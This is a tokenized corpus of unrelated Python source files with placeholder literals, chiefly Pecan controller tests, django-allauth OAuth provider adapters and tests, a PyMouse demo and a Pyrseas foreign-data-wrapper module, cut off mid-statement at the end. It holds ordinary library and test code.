'<STR_LIT>' } <EOL> @ index . 
when ( method = '<STR_LIT:POST>' , template = '<STR_LIT>' ) <EOL> def index_post ( self , req , resp ) : <EOL> assert self . __class__ . __name__ == '<STR_LIT>' <EOL> assert isinstance ( req , Request ) <EOL> assert isinstance ( resp , Response ) <EOL> assert self . unique == req . headers . get ( '<STR_LIT>' ) <EOL> return req . json <EOL> @ expose ( template = '<STR_LIT>' ) <EOL> def echo ( self , req , resp ) : <EOL> assert self . __class__ . __name__ == '<STR_LIT>' <EOL> assert isinstance ( req , Request ) <EOL> assert isinstance ( resp , Response ) <EOL> assert self . unique == req . headers . get ( '<STR_LIT>' ) <EOL> return req . json <EOL> @ expose ( template = '<STR_LIT>' ) <EOL> def extra ( self , req , resp , first , second ) : <EOL> assert self . __class__ . __name__ == '<STR_LIT>' <EOL> assert isinstance ( req , Request ) <EOL> assert isinstance ( resp , Response ) <EOL> assert self . unique == req . headers . get ( '<STR_LIT>' ) <EOL> return { '<STR_LIT>' : first , '<STR_LIT>' : second } <EOL> return RootController <EOL> def test_generics_with_im_self_default ( self ) : <EOL> uniq = str ( time . time ( ) ) <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( uniq ) , use_context_locals = False ) ) <EOL> r = app . get ( '<STR_LIT:/>' , headers = { '<STR_LIT>' : uniq } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> json_resp = loads ( r . body . decode ( ) ) <EOL> assert json_resp [ '<STR_LIT:hello>' ] == '<STR_LIT>' <EOL> def test_generics_with_im_self_with_method ( self ) : <EOL> uniq = str ( time . time ( ) ) <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( uniq ) , use_context_locals = False ) ) <EOL> r = app . post_json ( '<STR_LIT:/>' , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , headers = { '<STR_LIT>' : uniq } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> json_resp = loads ( r . body . 
decode ( ) ) <EOL> assert json_resp [ '<STR_LIT:foo>' ] == '<STR_LIT:bar>' <EOL> def test_generics_with_im_self_with_path ( self ) : <EOL> uniq = str ( time . time ( ) ) <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( uniq ) , use_context_locals = False ) ) <EOL> r = app . post_json ( '<STR_LIT>' , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , <EOL> headers = { '<STR_LIT>' : uniq } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> json_resp = loads ( r . body . decode ( ) ) <EOL> assert json_resp [ '<STR_LIT:foo>' ] == '<STR_LIT:bar>' <EOL> def test_generics_with_im_self_with_extra_args ( self ) : <EOL> uniq = str ( time . time ( ) ) <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( uniq ) , use_context_locals = False ) ) <EOL> r = app . get ( '<STR_LIT>' , headers = { '<STR_LIT>' : uniq } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> json_resp = loads ( r . body . decode ( ) ) <EOL> assert json_resp [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert json_resp [ '<STR_LIT>' ] == '<STR_LIT>' </s>
<s> from django . db import migrations </s>
<s> from allauth . socialaccount . providers . oauth2 . urls import default_urlpatterns <EOL> from . provider import AmazonProvider <EOL> urlpatterns = default_urlpatterns ( AmazonProvider ) </s>
<s> from allauth . socialaccount . tests import OAuth2TestsMixin <EOL> from allauth . tests import MockedResponse , TestCase <EOL> from . provider import BitlyProvider <EOL> class BitlyTests ( OAuth2TestsMixin , TestCase ) : <EOL> provider_id = BitlyProvider . id <EOL> def get_mocked_response ( self ) : <EOL> return MockedResponse ( <NUM_LIT:200> , """<STR_LIT>""" ) </s>
<s> from allauth . socialaccount . tests import OAuth2TestsMixin <EOL> from allauth . tests import MockedResponse , TestCase <EOL> from . provider import EdmodoProvider <EOL> class EdmodoTests ( OAuth2TestsMixin , TestCase ) : <EOL> provider_id = EdmodoProvider . id <EOL> def get_mocked_response ( self ) : <EOL> return MockedResponse ( <NUM_LIT:200> , """<STR_LIT>""" ) </s>
<s> import requests <EOL> from allauth . socialaccount . providers . oauth2 . views import ( OAuth2Adapter , <EOL> OAuth2LoginView , <EOL> OAuth2CallbackView ) <EOL> from . provider import FoursquareProvider <EOL> class FoursquareOAuth2Adapter ( OAuth2Adapter ) : <EOL> provider_id = FoursquareProvider . id <EOL> access_token_url = '<STR_LIT>' <EOL> authorize_url = '<STR_LIT>' <EOL> profile_url = '<STR_LIT>' <EOL> def complete_login ( self , request , app , token , ** kwargs ) : <EOL> resp = requests . get ( <EOL> self . profile_url , <EOL> params = { '<STR_LIT>' : token . token , '<STR_LIT:v>' : '<STR_LIT>' } ) <EOL> extra_data = resp . json ( ) [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] <EOL> return self . get_provider ( ) . sociallogin_from_response ( request , <EOL> extra_data ) <EOL> oauth2_login = OAuth2LoginView . adapter_view ( FoursquareOAuth2Adapter ) <EOL> oauth2_callback = OAuth2CallbackView . adapter_view ( FoursquareOAuth2Adapter ) </s>
<s> from xml . etree import ElementTree <EOL> from xml . parsers . expat import ExpatError <EOL> from django . utils import six <EOL> from allauth . socialaccount import providers <EOL> from allauth . socialaccount . providers . oauth . client import OAuth <EOL> from allauth . socialaccount . providers . oauth . views import ( OAuthAdapter , <EOL> OAuthLoginView , <EOL> OAuthCallbackView ) <EOL> from . provider import LinkedInProvider <EOL> class LinkedInAPI ( OAuth ) : <EOL> url = '<STR_LIT>' <EOL> def get_user_info ( self ) : <EOL> fields = providers . registry . by_id ( LinkedInProvider . id ) . get_profile_fields ( ) <EOL> url = self . url + '<STR_LIT>' % '<STR_LIT:U+002C>' . join ( fields ) <EOL> raw_xml = self . query ( url ) <EOL> if not six . PY3 : <EOL> raw_xml = raw_xml . encode ( '<STR_LIT:utf8>' ) <EOL> try : <EOL> return self . to_dict ( ElementTree . fromstring ( raw_xml ) ) <EOL> except ( ExpatError , KeyError , IndexError ) : <EOL> return None <EOL> def to_dict ( self , xml ) : <EOL> """<STR_LIT>""" <EOL> children = list ( xml ) <EOL> if not children : <EOL> return xml . text <EOL> else : <EOL> out = { } <EOL> for node in list ( xml ) : <EOL> if node . tag in out : <EOL> if not isinstance ( out [ node . tag ] , list ) : <EOL> out [ node . tag ] = [ out [ node . tag ] ] <EOL> out [ node . tag ] . append ( self . to_dict ( node ) ) <EOL> else : <EOL> out [ node . tag ] = self . to_dict ( node ) <EOL> return out <EOL> class LinkedInOAuthAdapter ( OAuthAdapter ) : <EOL> provider_id = LinkedInProvider . id <EOL> request_token_url = '<STR_LIT>' <EOL> access_token_url = '<STR_LIT>' <EOL> authorize_url = '<STR_LIT>' <EOL> def complete_login ( self , request , app , token , response ) : <EOL> client = LinkedInAPI ( request , app . client_id , app . secret , <EOL> self . request_token_url ) <EOL> extra_data = client . get_user_info ( ) <EOL> return self . get_provider ( ) . 
sociallogin_from_response ( request , <EOL> extra_data ) <EOL> oauth_login = OAuthLoginView . adapter_view ( LinkedInOAuthAdapter ) <EOL> oauth_callback = OAuthCallbackView . adapter_view ( LinkedInOAuthAdapter ) </s>
<s> from openid . consumer import consumer <EOL> from django . core . urlresolvers import reverse <EOL> from allauth . utils import get_user_model <EOL> from allauth . tests import TestCase , Mock , patch <EOL> from . import views <EOL> from . utils import AXAttribute <EOL> class OpenIDTests ( TestCase ) : <EOL> def test_discovery_failure ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . client . post ( reverse ( '<STR_LIT>' ) , <EOL> dict ( openid = '<STR_LIT>' ) ) <EOL> self . assertTrue ( '<STR_LIT>' in resp . context [ '<STR_LIT>' ] . errors ) <EOL> def test_login ( self ) : <EOL> resp = self . client . post ( reverse ( views . login ) , <EOL> dict ( openid = '<STR_LIT>' ) ) <EOL> assert '<STR_LIT>' in resp [ '<STR_LIT:location>' ] <EOL> with patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) as consumer_mock : <EOL> client = Mock ( ) <EOL> complete = Mock ( ) <EOL> consumer_mock . return_value = client <EOL> client . complete = complete <EOL> complete_response = Mock ( ) <EOL> complete . return_value = complete_response <EOL> complete_response . status = consumer . SUCCESS <EOL> complete_response . identity_url = '<STR_LIT>' <EOL> with patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) as sr_mock : <EOL> with patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) as fr_mock : <EOL> sreg_mock = Mock ( ) <EOL> ax_mock = Mock ( ) <EOL> sr_mock . fromSuccessResponse = sreg_mock <EOL> fr_mock . fromSuccessResponse = ax_mock <EOL> sreg_mock . return_value = { } <EOL> ax_mock . return_value = { AXAttribute . PERSON_FIRST_NAME : <EOL> [ '<STR_LIT>' ] } <EOL> resp = self . client . post ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertRedirects ( <EOL> resp , <EOL> '<STR_LIT>' , <EOL> fetch_redirect_response = False ) <EOL> get_user_model ( ) . objects . get ( first_name = '<STR_LIT>' ) </s>
<s> from allauth . socialaccount import providers <EOL> from allauth . socialaccount . providers . base import ProviderAccount <EOL> from allauth . socialaccount . providers . oauth2 . provider import OAuth2Provider <EOL> class ShopifyAccount ( ProviderAccount ) : <EOL> pass <EOL> class ShopifyProvider ( OAuth2Provider ) : <EOL> id = '<STR_LIT>' <EOL> name = '<STR_LIT>' <EOL> account_class = ShopifyAccount <EOL> def get_auth_params ( self , request , action ) : <EOL> ret = super ( ShopifyProvider , self ) . get_auth_params ( request , action ) <EOL> shop = request . GET . get ( '<STR_LIT>' , None ) <EOL> if shop : <EOL> ret . update ( { '<STR_LIT>' : shop } ) <EOL> return ret <EOL> def get_default_scope ( self ) : <EOL> return [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def extract_uid ( self , data ) : <EOL> return str ( data [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> def extract_common_fields ( self , data ) : <EOL> return dict ( email = data [ '<STR_LIT>' ] [ '<STR_LIT:email>' ] ) <EOL> providers . registry . register ( ShopifyProvider ) </s>
<s> import requests <EOL> from allauth . socialaccount . providers . oauth2 . views import ( OAuth2Adapter , <EOL> OAuth2LoginView , <EOL> OAuth2CallbackView ) <EOL> from . provider import TwitchProvider <EOL> class TwitchOAuth2Adapter ( OAuth2Adapter ) : <EOL> provider_id = TwitchProvider . id <EOL> access_token_url = '<STR_LIT>' <EOL> authorize_url = '<STR_LIT>' <EOL> profile_url = '<STR_LIT>' <EOL> def complete_login ( self , request , app , token , ** kwargs ) : <EOL> resp = requests . get ( <EOL> self . profile_url , <EOL> params = { '<STR_LIT>' : token . token , <EOL> '<STR_LIT>' : app . client_id } ) <EOL> extra_data = resp . json ( ) <EOL> return self . get_provider ( ) . sociallogin_from_response ( request , <EOL> extra_data ) <EOL> oauth2_login = OAuth2LoginView . adapter_view ( TwitchOAuth2Adapter ) <EOL> oauth2_callback = OAuth2CallbackView . adapter_view ( TwitchOAuth2Adapter ) </s>
<s> from django . conf . urls import url <EOL> from . import views <EOL> urlpatterns = [ <EOL> url ( '<STR_LIT>' , views . login_cancelled , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views . login_error , name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views . signup , name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views . connections , name = '<STR_LIT>' ) <EOL> ] </s>
<s> from django . conf . urls import patterns , url <EOL> from demoproject . filter import views <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . user_list_view , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> from pymouse import PyMouse <EOL> import random , time <EOL> try : <EOL> from pymouse import PyMouseEvent <EOL> class event ( PyMouseEvent ) : <EOL> def move ( self , x , y ) : <EOL> print "<STR_LIT>" , x , y <EOL> def click ( self , x , y , button , press ) : <EOL> if press : <EOL> print "<STR_LIT>" , x , y , "<STR_LIT>" , button <EOL> else : <EOL> print "<STR_LIT>" , x , y , "<STR_LIT>" , button <EOL> e = event ( ) <EOL> e . start ( ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> m = PyMouse ( ) <EOL> try : <EOL> size = m . screen_size ( ) <EOL> print "<STR_LIT>" % ( str ( size ) ) <EOL> pos = ( random . randint ( <NUM_LIT:0> , size [ <NUM_LIT:0> ] ) , random . randint ( <NUM_LIT:0> , size [ <NUM_LIT:1> ] ) ) <EOL> except : <EOL> pos = ( random . randint ( <NUM_LIT:0> , <NUM_LIT> ) , random . randint ( <NUM_LIT:0> , <NUM_LIT> ) ) <EOL> print "<STR_LIT>" % ( str ( pos ) ) <EOL> m . move ( pos [ <NUM_LIT:0> ] , pos [ <NUM_LIT:1> ] ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> m . click ( pos [ <NUM_LIT:0> ] , pos [ <NUM_LIT:1> ] , <NUM_LIT:1> ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> m . click ( pos [ <NUM_LIT:0> ] , pos [ <NUM_LIT:1> ] , <NUM_LIT:2> ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> m . click ( pos [ <NUM_LIT:0> ] , pos [ <NUM_LIT:1> ] , <NUM_LIT:3> ) <EOL> try : <EOL> e . stop ( ) <EOL> except : <EOL> pass </s>
<s> from setuptools import setup <EOL> import stallion <EOL> import sys <EOL> install_requirements = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> install_requirements . append ( '<STR_LIT>' ) <EOL> def long_description ( ) : <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> ) : <EOL> f = open ( "<STR_LIT>" , mode = "<STR_LIT:r>" , encoding = "<STR_LIT:utf-8>" ) <EOL> else : <EOL> f = open ( "<STR_LIT>" , mode = "<STR_LIT:r>" ) <EOL> return f . read ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = stallion . __version__ , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = stallion . __author__ , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description ( ) , <EOL> packages = [ '<STR_LIT>' ] , <EOL> keywords = '<STR_LIT>' , <EOL> platforms = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> include_package_data = True , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } , <EOL> install_requires = install_requirements , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> } , <EOL> ) </s>
<s> from __future__ import division <EOL> import numpy as np <EOL> def mymean ( x ) : <EOL> return np . ma . mean ( x ) </s>
<s> """<STR_LIT>""" <EOL> from pyrseas . dbobject import DbObjectDict , DbObject <EOL> from pyrseas . dbobject import quote_id , commentable , ownable , grantable <EOL> from pyrseas . dbobject . table import ClassDict , Table <EOL> from pyrseas . dbobject . privileges import privileges_from_map <EOL> class DbObjectWithOptions ( DbObject ) : <EOL> """<STR_LIT>""" <EOL> def options_clause ( self ) : <EOL> """<STR_LIT>""" <EOL> opts = [ ] <EOL> for opt in self . options : <EOL> ( nm , val ) = opt . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> opts . append ( "<STR_LIT>" % ( nm , val ) ) <EOL> return "<STR_LIT>" % '<STR_LIT:U+002CU+0020>' . join ( opts ) <EOL> def diff_options ( self , newopts ) : <EOL> """<STR_LIT>""" <EOL> def to_dict ( optlist ) : <EOL> return dict ( opt . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) for opt in optlist ) <EOL> oldopts = { } <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> oldopts = to_dict ( self . options ) <EOL> newopts = to_dict ( newopts ) <EOL> clauses = [ ] <EOL> for key , val in list ( newopts . items ( ) ) : <EOL> if key not in oldopts : <EOL> clauses . append ( "<STR_LIT>" % ( key , val ) ) <EOL> elif val != oldopts [ key ] : <EOL> clauses . append ( "<STR_LIT>" % ( key , val ) ) <EOL> for key , val in list ( oldopts . items ( ) ) : <EOL> if key not in newopts : <EOL> clauses . append ( "<STR_LIT>" % key ) <EOL> return clauses and "<STR_LIT>" % '<STR_LIT:U+002CU+0020>' . join ( clauses ) or '<STR_LIT>' <EOL> def diff_map ( self , inobj ) : <EOL> """<STR_LIT>""" <EOL> stmts = super ( DbObjectWithOptions , self ) . diff_map ( inobj ) <EOL> newopts = [ ] <EOL> if hasattr ( inobj , '<STR_LIT>' ) : <EOL> newopts = inobj . options <EOL> diff_opts = self . diff_options ( newopts ) <EOL> if diff_opts : <EOL> stmts . append ( "<STR_LIT>" % ( <EOL> self . objtype , self . 
identifier ( ) , diff_opts ) ) <EOL> return stmts <EOL> class ForeignDataWrapper ( DbObjectWithOptions ) : <EOL> """<STR_LIT>""" <EOL> objtype = "<STR_LIT>" <EOL> single_extern_file = True <EOL> @ property <EOL> def allprivs ( self ) : <EOL> return '<STR_LIT>' <EOL> def to_map ( self , no_owner , no_privs ) : <EOL> """<STR_LIT>""" <EOL> wrapper = self . _base_map ( no_owner , no_privs ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> srvs = { } <EOL> for srv in self . servers : <EOL> srvs . update ( self . servers [ srv ] . to_map ( no_owner , no_privs ) ) <EOL> wrapper . update ( srvs ) <EOL> del wrapper [ '<STR_LIT>' ] <EOL> return wrapper <EOL> @ commentable <EOL> @ grantable <EOL> @ ownable <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> clauses = [ ] <EOL> for fnc in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if hasattr ( self , fnc ) : <EOL> clauses . append ( "<STR_LIT>" % ( fnc . upper ( ) , getattr ( self , fnc ) ) ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> clauses . append ( self . options_clause ( ) ) <EOL> return [ "<STR_LIT>" % ( <EOL> quote_id ( self . name ) , <EOL> clauses and '<STR_LIT>' + '<STR_LIT>' . join ( clauses ) or '<STR_LIT>' ) ] <EOL> def diff_map ( self , inwrapper ) : <EOL> """<STR_LIT>""" <EOL> stmts = super ( ForeignDataWrapper , self ) . diff_map ( inwrapper ) <EOL> if inwrapper . owner is not None : <EOL> if inwrapper . owner != self . owner : <EOL> stmts . append ( self . alter_owner ( inwrapper . owner ) ) <EOL> stmts . append ( self . diff_description ( inwrapper ) ) <EOL> return stmts <EOL> QUERY_PRE91 = """<STR_LIT>""" <EOL> class ForeignDataWrapperDict ( DbObjectDict ) : <EOL> "<STR_LIT>" <EOL> cls = ForeignDataWrapper <EOL> query = """<STR_LIT>""" <EOL> def _from_catalog ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . dbconn . version < <NUM_LIT> : <EOL> self . query = QUERY_PRE91 <EOL> super ( ForeignDataWrapperDict , self ) . 
_from_catalog ( ) <EOL> def from_map ( self , inwrappers , newdb ) : <EOL> """<STR_LIT>""" <EOL> for key in inwrappers : <EOL> if not key . startswith ( '<STR_LIT>' ) : <EOL> raise KeyError ( "<STR_LIT>" % key ) <EOL> fdw = key [ <NUM_LIT> : ] <EOL> self [ fdw ] = wrapper = ForeignDataWrapper ( name = fdw ) <EOL> inwrapper = inwrappers [ key ] <EOL> inservs = { } <EOL> for key in inwrapper : <EOL> if key . startswith ( '<STR_LIT>' ) : <EOL> inservs . update ( { key : inwrapper [ key ] } ) <EOL> elif key in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:description>' ] : <EOL> setattr ( wrapper , key , inwrapper [ key ] ) <EOL> elif key == '<STR_LIT>' : <EOL> wrapper . privileges = privileges_from_map ( <EOL> inwrapper [ key ] , wrapper . allprivs , inwrapper [ '<STR_LIT>' ] ) <EOL> else : <EOL> raise KeyError ( "<STR_LIT>" % key ) <EOL> newdb . servers . from_map ( wrapper , inservs , newdb ) <EOL> def link_refs ( self , dbservers ) : <EOL> """<STR_LIT>""" <EOL> for ( fdw , srv ) in dbservers : <EOL> dbserver = dbservers [ ( fdw , srv ) ] <EOL> assert self [ fdw ] <EOL> wrapper = self [ fdw ] <EOL> if not hasattr ( wrapper , '<STR_LIT>' ) : <EOL> wrapper . servers = { } <EOL> wrapper . servers . update ( { srv : dbserver } ) <EOL> def diff_map ( self , inwrappers ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for fdw in inwrappers : <EOL> infdw = inwrappers [ fdw ] <EOL> if fdw in self : <EOL> stmts . append ( self [ fdw ] . diff_map ( infdw ) ) <EOL> else : <EOL> if hasattr ( infdw , '<STR_LIT>' ) : <EOL> oldname = infdw . oldname <EOL> try : <EOL> stmts . append ( self [ oldname ] . rename ( infdw . name ) ) <EOL> del self [ oldname ] <EOL> except KeyError as exc : <EOL> exc . args = ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( oldname , infdw . name ) , ) <EOL> raise <EOL> else : <EOL> stmts . append ( infdw . create ( ) ) <EOL> for fdw in self : <EOL> if fdw not in inwrappers : <EOL> self [ fdw ] . 
dropped = True <EOL> return stmts <EOL> def _drop ( self ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for fdw in self : <EOL> if hasattr ( self [ fdw ] , '<STR_LIT>' ) : <EOL> stmts . append ( self [ fdw ] . drop ( ) ) <EOL> return stmts <EOL> class ForeignServer ( DbObjectWithOptions ) : <EOL> """<STR_LIT>""" <EOL> objtype = "<STR_LIT>" <EOL> privobjtype = "<STR_LIT>" <EOL> keylist = [ '<STR_LIT>' , '<STR_LIT:name>' ] <EOL> @ property <EOL> def allprivs ( self ) : <EOL> return '<STR_LIT>' <EOL> def identifier ( self ) : <EOL> """<STR_LIT>""" <EOL> return quote_id ( self . name ) <EOL> def to_map ( self , no_owner , no_privs ) : <EOL> """<STR_LIT>""" <EOL> key = self . extern_key ( ) <EOL> server = { key : self . _base_map ( no_owner , no_privs ) } <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> umaps = { } <EOL> for umap in self . usermaps : <EOL> umaps . update ( { umap : self . usermaps [ umap ] . to_map ( ) } ) <EOL> server [ key ] [ '<STR_LIT>' ] = umaps <EOL> del server [ key ] [ '<STR_LIT>' ] <EOL> return server <EOL> @ commentable <EOL> @ grantable <EOL> @ ownable <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> clauses = [ ] <EOL> options = [ ] <EOL> for opt in [ '<STR_LIT:type>' , '<STR_LIT:version>' ] : <EOL> if hasattr ( self , opt ) : <EOL> clauses . append ( "<STR_LIT>" % ( opt . upper ( ) , getattr ( self , opt ) ) ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> options . append ( self . options_clause ( ) ) <EOL> return [ "<STR_LIT>" % ( <EOL> quote_id ( self . name ) , <EOL> clauses and '<STR_LIT:U+0020>' + '<STR_LIT:U+0020>' . join ( clauses ) or '<STR_LIT>' , <EOL> quote_id ( self . wrapper ) , <EOL> options and '<STR_LIT>' + '<STR_LIT>' . join ( options ) or '<STR_LIT>' ) ] <EOL> def diff_map ( self , inserver ) : <EOL> """<STR_LIT>""" <EOL> stmts = super ( ForeignServer , self ) . diff_map ( inserver ) <EOL> if inserver . owner is not None : <EOL> if inserver . owner != self . owner : <EOL> stmts . append ( self . 
alter_owner ( inserver . owner ) ) <EOL> stmts . append ( self . diff_description ( inserver ) ) <EOL> return stmts <EOL> class ForeignServerDict ( DbObjectDict ) : <EOL> "<STR_LIT>" <EOL> cls = ForeignServer <EOL> query = """<STR_LIT>""" <EOL> def from_map ( self , wrapper , inservers , newdb ) : <EOL> """<STR_LIT>""" <EOL> for key in inservers : <EOL> if not key . startswith ( '<STR_LIT>' ) : <EOL> raise KeyError ( "<STR_LIT>" % key ) <EOL> srv = key [ <NUM_LIT:7> : ] <EOL> self [ ( wrapper . name , srv ) ] = serv = ForeignServer ( <EOL> wrapper = wrapper . name , name = srv ) <EOL> inserv = inservers [ key ] <EOL> if inserv : <EOL> for attr , val in list ( inserv . items ( ) ) : <EOL> setattr ( serv , attr , val ) <EOL> if '<STR_LIT>' in inserv : <EOL> newdb . usermaps . from_map ( serv , inserv [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in inserv : <EOL> del inserv [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in inserv : <EOL> serv . privileges = privileges_from_map ( <EOL> inserv [ '<STR_LIT>' ] , serv . allprivs , serv . owner ) <EOL> def to_map ( self , no_owner , no_privs ) : <EOL> """<STR_LIT>""" <EOL> servers = { } <EOL> for srv in self : <EOL> servers . update ( self [ srv ] . to_map ( no_owner , no_privs ) ) <EOL> return servers <EOL> def link_refs ( self , dbusermaps ) : <EOL> """<STR_LIT>""" <EOL> for ( fdw , srv , usr ) in dbusermaps : <EOL> dbusermap = dbusermaps [ ( fdw , srv , usr ) ] <EOL> assert self [ ( fdw , srv ) ] <EOL> server = self [ ( fdw , srv ) ] <EOL> if not hasattr ( server , '<STR_LIT>' ) : <EOL> server . usermaps = { } <EOL> server . usermaps . update ( { usr : dbusermap } ) <EOL> def diff_map ( self , inservers ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for ( fdw , srv ) in inservers : <EOL> insrv = inservers [ ( fdw , srv ) ] <EOL> if ( fdw , srv ) in self : <EOL> stmts . append ( self [ ( fdw , srv ) ] . diff_map ( insrv ) ) <EOL> else : <EOL> if hasattr ( insrv , '<STR_LIT>' ) : <EOL> oldname = insrv . 
oldname <EOL> try : <EOL> stmts . append ( self [ ( fdw , oldname ) ] . rename ( insrv . name ) ) <EOL> del self [ oldname ] <EOL> except KeyError as exc : <EOL> exc . args = ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( oldname , insrv . name ) , ) <EOL> raise <EOL> else : <EOL> stmts . append ( insrv . create ( ) ) <EOL> for srv in self : <EOL> if srv not in inservers : <EOL> self [ srv ] . dropped = True <EOL> return stmts <EOL> def _drop ( self ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for srv in self : <EOL> if hasattr ( self [ srv ] , '<STR_LIT>' ) : <EOL> stmts . append ( self [ srv ] . drop ( ) ) <EOL> return stmts <EOL> class UserMapping ( DbObjectWithOptions ) : <EOL> """<STR_LIT>""" <EOL> objtype = "<STR_LIT>" <EOL> keylist = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ] <EOL> def extern_key ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . name <EOL> def identifier ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( <EOL> self . name == '<STR_LIT>' and '<STR_LIT>' or quote_id ( self . name ) , <EOL> quote_id ( self . server ) ) <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> options = [ ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> options . append ( self . options_clause ( ) ) <EOL> return [ "<STR_LIT>" % ( <EOL> self . name == '<STR_LIT>' and '<STR_LIT>' or <EOL> quote_id ( self . name ) , quote_id ( self . server ) , <EOL> options and '<STR_LIT>' + '<STR_LIT>' . join ( options ) or '<STR_LIT>' ) ] <EOL> class UserMappingDict ( DbObjectDict ) : <EOL> "<STR_LIT>" <EOL> cls = UserMapping <EOL> query = """<STR_LIT>""" <EOL> def from_map ( self , server , inusermaps ) : <EOL> """<STR_LIT>""" <EOL> for key in inusermaps : <EOL> usermap = UserMapping ( wrapper = server . wrapper , server = server . name , <EOL> name = key ) <EOL> inusermap = inusermaps [ key ] <EOL> if inusermap : <EOL> for attr , val in list ( inusermap . 
items ( ) ) : <EOL> setattr ( usermap , attr , val ) <EOL> if '<STR_LIT>' in inusermap : <EOL> del inusermap [ '<STR_LIT>' ] <EOL> self [ ( server . wrapper , server . name , key ) ] = usermap <EOL> def to_map ( self ) : <EOL> """<STR_LIT>""" <EOL> usermaps = { } <EOL> for um in self : <EOL> usermaps . update ( self [ um ] . to_map ( ) ) <EOL> return usermaps <EOL> def diff_map ( self , inusermaps ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for ( fdw , srv , usr ) in inusermaps : <EOL> inump = inusermaps [ ( fdw , srv , usr ) ] <EOL> if ( fdw , srv , usr ) in self : <EOL> stmts . append ( self [ ( fdw , srv , usr ) ] . diff_map ( inump ) ) <EOL> else : <EOL> if hasattr ( inump , '<STR_LIT>' ) : <EOL> oldname = inump . oldname <EOL> try : <EOL> stmts . append ( self [ ( fdw , srv , oldname ) ] . rename ( <EOL> inump . name ) ) <EOL> del self [ ( fdw , srv , oldname ) ] <EOL> except KeyError as exc : <EOL> exc . args = ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( oldname , inump . name ) , ) <EOL> raise <EOL> else : <EOL> stmts . append ( inump . create ( ) ) <EOL> for ( fdw , srv , usr ) in self : <EOL> if ( fdw , srv , usr ) not in inusermaps : <EOL> stmts . append ( self 